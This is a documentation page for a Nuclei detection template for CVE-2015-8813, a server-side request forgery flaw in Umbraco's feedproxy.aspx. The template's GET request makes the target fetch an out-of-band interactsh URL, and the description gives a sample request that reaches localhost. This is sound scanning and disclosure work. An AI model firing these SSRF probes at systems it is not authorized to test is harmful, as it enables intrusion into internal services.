Skip to content
Nuclei Templates

Umbraco <7.4.0- Server-Side Request Forgery

ID: CVE-2015-8813

Severity: high

Author: emadshanab

Tags: cve2015,cve,ssrf,oast,umbraco

Description

Section titled “Description”

Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.

YAML Source

Section titled “YAML Source”
id: CVE-2015-8813


info:
  name: Umbraco <7.4.0- Server-Side Request Forgery
  author: emadshanab
  severity: high
  description: Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.
  impact: |
    The vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further exploitation.
  remediation: |
    Upgrade Umbraco to version 7.4.0 or above to mitigate the vulnerability and apply any necessary patches or security updates.
  reference:
    - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
    - https://github.com/umbraco/Umbraco-CMS/commit/924a016ffe7ae7ea6d516c07a7852f0095eddbce
    - http://www.openwall.com/lists/oss-security/2016/02/18/8
    - http://issues.umbraco.org/issue/U4-7457
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
    cvss-score: 8.2
    cve-id: CVE-2015-8813
    cwe-id: CWE-918
    epss-score: 0.00511
    epss-percentile: 0.76541
    cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: umbraco
    product: umbraco
  tags: cve2015,cve,ssrf,oast,umbraco


http:
  - method: GET
    path:
      - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"


    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a0046304402204014bbc58415d851ed611efd9d001653588bdf6d614151f697e94462d401c0b7022026e05653d3a1cabd1fb9a791483de07ee818a49b578a6a917e11ab848c22259c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-8813.yaml"

View on Github